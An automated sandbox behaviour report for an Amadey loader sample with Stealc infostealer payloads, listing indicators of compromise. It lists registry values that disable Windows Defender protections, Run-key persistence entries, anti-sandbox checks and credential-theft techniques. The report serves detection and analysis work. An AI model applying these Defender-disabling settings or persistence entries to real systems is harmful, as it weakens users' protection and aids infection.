amadey | 8b91be73c8fdc9e0d3f9771945bd8d6cead01382bf4b9c68fd056047c7249b8f

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	0876cf74dd.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	0876cf74dd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	0876cf74dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	0876cf74dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	0876cf74dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	0876cf74dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	0876cf74dd.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	0876cf74dd.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	0876cf74dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	0876cf74dd.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2R0700.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebcf281f33.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0876cf74dd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bncn6rv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f2f8df5acc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f266eb5780.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8CKO89S7RFEHT4LV2KHUEN5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1E08u3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3E11p.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a26361a646.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	07a3928e11.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3572	powershell.exe
2664	powershell.exe
2292	powershell.exe
6948	powershell.exe
6712	powershell.exe
3572	powershell.exe
6948	powershell.exe
5292	powershell.exe

Downloads MZ/PE file 26 IoCs

flow	pid	Process
70	3512	BitLockerToGo.exe
76	4368	rapes.exe
76	4368	rapes.exe
76	4368	rapes.exe
76	4368	rapes.exe
35	3132	2R0700.exe
219	4368	rapes.exe
52	4872	BitLockerToGo.exe
242	4368	rapes.exe
242	4368	rapes.exe
242	4368	rapes.exe
242	4368	rapes.exe
242	4368	rapes.exe
242	4368	rapes.exe
242	4368	rapes.exe
244	4196	bncn6rv.exe
244	4196	bncn6rv.exe
244	4196	bncn6rv.exe
244	4196	bncn6rv.exe
244	4196	bncn6rv.exe
244	4196	bncn6rv.exe
244	4196	bncn6rv.exe
33	4368	rapes.exe
96	536	07a3928e11.exe
42	4368	rapes.exe
42	4368	rapes.exe

Uses browser remote debugging 2 TTPs 15 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4656	chrome.exe
6524	chrome.exe
6288	chrome.exe
3420	msedge.exe
3196	msedge.exe
6964	chrome.exe
6312	msedge.exe
5452	msedge.exe
5720	msedge.exe
6644	chrome.exe
5888	chrome.exe
4864	msedge.exe
2448	chrome.exe
5136	chrome.exe
6316	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000700000002428f-2959.dat	net_reactor
behavioral1/memory/3440-2983-0x0000000000AF0000-0x0000000000B50000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f266eb5780.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f266eb5780.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1E08u3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	07a3928e11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	07a3928e11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8CKO89S7RFEHT4LV2KHUEN5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bncn6rv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f2f8df5acc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebcf281f33.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebcf281f33.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8CKO89S7RFEHT4LV2KHUEN5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2R0700.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bncn6rv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1E08u3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a26361a646.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0876cf74dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0876cf74dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3E11p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2R0700.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3E11p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a26361a646.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f2f8df5acc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	1E08u3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 28 IoCs

pid	Process
4992	A7B94.exe
1080	1E08u3.exe
4368	rapes.exe
3132	2R0700.exe
2460	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
776	3E11p.exe
2576	a26361a646.exe
4836	ebcf281f33.exe
3508	f2f8df5acc.exe
856	7be4314deb.exe
3452	7be4314deb.exe
2508	rapes.exe
536	07a3928e11.exe
228	f266eb5780.exe
1136	8CKO89S7RFEHT4LV2KHUEN5.exe
4160	9dd5ebb048.exe
5996	0876cf74dd.exe
5528	PQkVDtx.exe
6384	COM Surrogate.exe
2596	packed.exe
6140	rapes.exe
4196	bncn6rv.exe
3440	mAtJWNv.exe
6420	mAtJWNv.exe
6604	HmngBpR.exe
7036	SplashWin.exe
384	SplashWin.exe
5984	FvbuInU.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	8CKO89S7RFEHT4LV2KHUEN5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	0876cf74dd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	a26361a646.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	ebcf281f33.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	1E08u3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	2R0700.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	f2f8df5acc.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	f266eb5780.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	07a3928e11.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	bncn6rv.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	3E11p.exe

Loads dropped DLL 9 IoCs

pid	Process
7036	SplashWin.exe
7036	SplashWin.exe
7036	SplashWin.exe
7036	SplashWin.exe
384	SplashWin.exe
384	SplashWin.exe
384	SplashWin.exe
4196	bncn6rv.exe
4196	bncn6rv.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	0876cf74dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	0876cf74dd.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	3257a90914b6dfdb338969b2a58a260a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	A7B94.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07a3928e11.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126650101\\07a3928e11.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f266eb5780.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126660101\\f266eb5780.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9dd5ebb048.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126670101\\9dd5ebb048.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0876cf74dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126680101\\0876cf74dd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall 43.053.0058.0001 = "C:\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.YourPhone_3wekyb108bbwe\\opt\\YourPhone.exe"	COM Surrogate.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000c000000023bf2-223.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
7084	tasklist.exe
2204	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
1080	1E08u3.exe
4368	rapes.exe
3132	2R0700.exe
2460	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
776	3E11p.exe
2576	a26361a646.exe
4836	ebcf281f33.exe
3508	f2f8df5acc.exe
2508	rapes.exe
536	07a3928e11.exe
228	f266eb5780.exe
1136	8CKO89S7RFEHT4LV2KHUEN5.exe
5996	0876cf74dd.exe
6140	rapes.exe
4196	bncn6rv.exe
5984	FvbuInU.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2576 set thread context of 4872	2576	a26361a646.exe	101
PID 856 set thread context of 3452	856	7be4314deb.exe	106
PID 4836 set thread context of 3512	4836	ebcf281f33.exe	105
PID 3440 set thread context of 6420	3440	mAtJWNv.exe	183
PID 384 set thread context of 5376	384	SplashWin.exe	218

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\runtime\COM Surrogate.exe	PQkVDtx.exe
File created	C:\Program Files\runtime\COM Surrogate.exe	packed.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	1E08u3.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3044	856	WerFault.exe	104
6516	3440	WerFault.exe	179
6080	6604	WerFault.exe	238

System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3257a90914b6dfdb338969b2a58a260a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0876cf74dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1E08u3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3E11p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9dd5ebb048.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bncn6rv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	07a3928e11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	9dd5ebb048.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2f8df5acc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8CKO89S7RFEHT4LV2KHUEN5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a26361a646.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebcf281f33.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f266eb5780.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A7B94.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2R0700.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7be4314deb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7be4314deb.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	9dd5ebb048.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	bncn6rv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	bncn6rv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	PQkVDtx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	packed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5004	taskkill.exe
4004	taskkill.exe
2372	taskkill.exe
2664	taskkill.exe
2460	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133858373546368034"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1296	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1080	1E08u3.exe
1080	1E08u3.exe
4368	rapes.exe
4368	rapes.exe
3132	2R0700.exe
3132	2R0700.exe
3132	2R0700.exe
3132	2R0700.exe
3132	2R0700.exe
3132	2R0700.exe
2460	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
2460	HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe
776	3E11p.exe
776	3E11p.exe
2576	a26361a646.exe
2576	a26361a646.exe
4836	ebcf281f33.exe
4836	ebcf281f33.exe
3508	f2f8df5acc.exe
3508	f2f8df5acc.exe
2508	rapes.exe
2508	rapes.exe
3452	7be4314deb.exe
3452	7be4314deb.exe
3452	7be4314deb.exe
3452	7be4314deb.exe
536	07a3928e11.exe
536	07a3928e11.exe
536	07a3928e11.exe
536	07a3928e11.exe
536	07a3928e11.exe
536	07a3928e11.exe
228	f266eb5780.exe
228	f266eb5780.exe
1136	8CKO89S7RFEHT4LV2KHUEN5.exe
1136	8CKO89S7RFEHT4LV2KHUEN5.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
5996	0876cf74dd.exe
5996	0876cf74dd.exe
5996	0876cf74dd.exe
5996	0876cf74dd.exe
5996	0876cf74dd.exe
6712	powershell.exe
6712	powershell.exe
6712	powershell.exe
6996	powershell.exe
6996	powershell.exe
6996	powershell.exe
3572	powershell.exe
3572	powershell.exe
3572	powershell.exe
6456	powershell.exe
6456	powershell.exe
6456	powershell.exe
2664	powershell.exe
2664	powershell.exe
6652	powershell.exe
6652	powershell.exe
2664	powershell.exe
6652	powershell.exe
2292	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
384	SplashWin.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
4864	msedge.exe
4864	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	856	7be4314deb.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	5004	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	992	firefox.exe
Token: SeDebugPrivilege	992	firefox.exe
Token: SeDebugPrivilege	5996	0876cf74dd.exe
Token: SeDebugPrivilege	6712	powershell.exe
